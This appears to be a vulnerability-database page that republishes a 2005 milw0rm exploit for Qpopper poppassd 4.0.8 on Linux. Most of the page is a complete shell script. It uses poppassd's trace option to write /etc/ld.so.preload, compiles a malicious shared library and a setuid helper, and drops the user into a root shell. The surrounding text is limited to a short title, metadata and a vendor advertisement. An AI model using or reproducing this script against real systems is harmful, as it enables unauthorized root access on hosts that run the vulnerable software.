Lucene search

K

Qpopper <= 4.0.8 (poppassd) Local Root Exploit (linux)

๐Ÿ—“๏ธย 01 Jul 2014ย 00:00:00Reported byย RootTypeย 
seebug
ย seebug
๐Ÿ”—ย www.seebug.org๐Ÿ‘ย 21ย Views

Qpopper local root exploit for linu

Show more
Code

                                                #!/bin/sh
# tested and working /str0ke
###########################################################################
# Linux Qpopper poppassd latest version local r00t exploit by kcope     ###
# August 2005                                                           ###
# Confidential - Keep Private!                                          ###
###########################################################################

POPPASSD_PATH=/usr/local/bin/poppassd

echo &#34;&#34;
echo &#34;Linux Qpopper poppassd latest version local r00t exploit by kcope&#34;
echo &#34;&#34;
sleep 2
umask 0000
if [ -f /etc/ld.so.preload ]; then
echo &#34;OOPS /etc/ld.so.preload already exists.. exploit failed!&#34;
exit
fi
cat &#62; program.c &#60;&#60; _EOF
#include &#60;unistd.h&#62;
#include &#60;stdio.h&#62;
#include &#60;sys/types.h&#62;
#include &#60;stdlib.h&#62;

void _init()
{
 if (!geteuid()) {
 setgid(0);
 setuid(0);
 remove(&#34;/etc/ld.so.preload&#34;);
 execl(&#34;/bin/sh&#34;,&#34;sh&#34;,&#34;-c&#34;,&#34;chown root:root /tmp/suid; chmod +s /tmp/suid&#34;,NULL);
 }
}

_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
cat &#62; suid.c &#60;&#60; _EOF
int main(void) {
       setgid(0); setuid(0);
       unlink(&#34;/tmp/suid&#34;);
       execl(&#34;/bin/sh&#34;,&#34;sh&#34;,0); }
_EOF

gcc -o /tmp/suid suid.c
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
echo &#34;--- Now type ENTER ---&#34;
echo &#34;&#34;
$POPPASSD_PATH -t /etc/ld.so.preload
echo /tmp/libno_ex.so.1.0 &#62; /etc/ld.so.preload
su
if [ -f /tmp/suid ]; then
echo &#34;IT&#39;S A ROOTSHELL!!!&#34;
/tmp/suid
else
echo &#34;Sorry, exploit failed.&#34;
fi

# milw0rm.com [2005-09-24]

                              

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
21
.json
Report